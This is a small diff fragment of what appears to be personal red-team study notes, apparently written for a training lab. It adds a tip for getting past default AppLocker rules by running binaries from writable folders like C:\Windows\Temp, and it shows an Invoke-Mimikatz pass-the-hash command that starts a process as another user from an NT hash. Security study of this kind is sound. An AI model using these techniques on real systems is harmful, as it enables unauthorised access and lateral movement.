deletehead/the_hax/every_villain_is_LEMONS.md

   ```
   - Note that the reg cmd value can be up to 16383 characters

+## App Whitelisting Bypasses
+- If default Applocker rules are applied, this means you can bypass by copying bins into `C:\Windows\Temp\` and similar writable folders for to execute.

 ## Mimikatz
 You can wrap these in for ex. `PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:lemons /domain:dollarcorp.moneycorp.local /ntlm:NThashHERE /run:powershell.exe`
 - Start new process as target user w/ NT hash: